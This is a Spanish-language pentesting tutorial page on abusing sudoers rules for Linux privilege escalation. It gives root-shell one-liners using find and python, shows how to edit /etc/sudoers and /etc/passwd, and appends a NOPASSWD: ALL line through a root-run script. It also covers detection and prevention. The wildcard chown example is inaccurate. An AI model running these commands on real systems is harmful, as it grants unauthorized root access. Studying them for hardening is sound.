Red Vault

Abuso de priviliegios a nivel de SUDOERS

4 min read

🛡️ Sudo: Análisis y Abuso de Privilegios

“Con gran poder viene gran responsabilidad… y posibilidades de explotación”

📋 Índice

🔍 ¿Qué es Sudo?

Definición

Sudo (SuperUser DO) es un programa diseñado para sistemas Unix/Linux que permite a los usuarios ejecutar programas con los privilegios de seguridad de otro usuario, normalmente el superusuario (root).

graph LR
    A[Usuario Normal] -->|sudo comando| B[Verificación de Permisos]
    B -->|Autorizado| C[Ejecución con Privilegios Elevados]
    B -->|Denegado| D[Acceso Rechazado]
    style C fill:#a5d6a7,stroke:#81c784
    style D fill:#ef9a9a,stroke:#e57373

⚙️ Configuración de Sudo

Los privilegios de sudo se configuran en el archivo /etc/sudoers o en archivos dentro del directorio /etc/sudoers.d/. Esta configuración determina quién puede usar sudo y qué comandos pueden ejecutar.

Advertencia

Nunca edites directamente el archivo sudoers. Utiliza siempre el comando visudo para evitar corromper el archivo.

Sintaxis Básica del Archivo Sudoers

usuario ALL=(ALL) NOPASSWD: comando

Donde:

ComponenteDescripción
usuarioNombre del usuario con permisos
ALL (primer)Host en el que se aplica la regla
(ALL)Usuario al que se cambiará (generalmente root)
NOPASSWD:Indica que no se requiere contraseña
comandoComando específico que puede ejecutar

Ejemplo:

usuario ALL=(root) NOPASSWD: /usr/bin/apt-get

🔓 Posibles Vectores de Abuso

Tip

Para encontrar binarios explotables, consulta siempre GTFOBins - una extensa biblioteca de técnicas de abuso para binarios comunes.

1. Ejecución de Comandos Específicos

Escenario

Supongamos que un usuario tiene permiso para ejecutar un comando específico como root:

usuario ALL=(ALL) NOPASSWD: /usr/bin/find

Abuso:

# El usuario puede usar 'find' para ejecutar comandos arbitrarios
sudo find / -exec /bin/bash \;

Este comando inicia una shell con privilegios de root.

2. Permisos de Edición de Archivos Sensibles

Escenario

El usuario puede editar cualquier archivo usando vim:

usuario ALL=(ALL) NOPASSWD: /usr/bin/vim

Abuso:

# Editar el archivo sudoers para otorgarse más privilegios
sudo vim /etc/sudoers
 
# O añadir un usuario al archivo passwd
sudo vim /etc/passwd

3. Wildcards en la Configuración

Escenario

Configuración con wildcards:

usuario ALL=(ALL) NOPASSWD: /bin/chown * /home/usuario/archivo

Abuso:

# Usar el wildcard para ejecutar comandos adicionales
sudo chown root --reference=/etc/passwd /home/usuario/archivo

4. Comandos que Pueden Lanzar Shells

Escenario

Usuario con permiso para usar programas que pueden lanzar shells:

usuario ALL=(ALL) NOPASSWD: /usr/bin/python

Abuso:

# Lanzar una shell con privilegios de root mediante Python
sudo python -c 'import os; os.system("/bin/bash")'

5. Permisos de Sudo sin Contraseña

Escenario

Configuración NOPASSWD para todos los comandos:

usuario ALL=(ALL) NOPASSWD: ALL

Abuso:

# El usuario puede ejecutar cualquier comando como root sin contraseña
sudo su -

🛡️ Cómo Detectar y Prevenir estos Abusos

  • Revisión Regular: Auditar periódicamente el archivo sudoers
  • Principio de Privilegio Mínimo: Otorgar solo los privilegios necesarios
  • Evitar Wildcards: No usar comodines en la configuración de sudo
  • Monitoreo: Implementar sistemas de monitoreo para detectar abusos
  • Usar sudoreplay: Para auditar las sesiones de sudo

🔧 Comandos Útiles para Verificación

# Ver tus permisos sudo
sudo -l
 
# Verificar la sintaxis del archivo sudoers
visudo -c
 
# Ver quién tiene privilegios sudo en el sistema
grep -r "ALL=(ALL)" /etc/sudoers /etc/sudoers.d/

🎯 Ejemplo Práctico de Escalada de Privilegios

Escenario de alto riesgo

Supongamos que tienes permisos para ejecutar un script como root y además puedes modificarlo:

usuario ALL=(ALL) NOPASSWD: /scripts/backup.sh

Si puedes editar este script, podrías:

# Añadir al final del script
echo 'echo "usuario ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers' >> /scripts/backup.sh
 
# Ejecutar el script con sudo
sudo /scripts/backup.sh
 
# Ahora tienes acceso completo a sudo
sudo su

📚 Referencias y Recursos

Recursos relacionados

Técnicas de escalada organizadas por tipo

seguridad linux sudo escalada_privilegios pentesting

Escalada de Privilegios

Graph View

Backlinks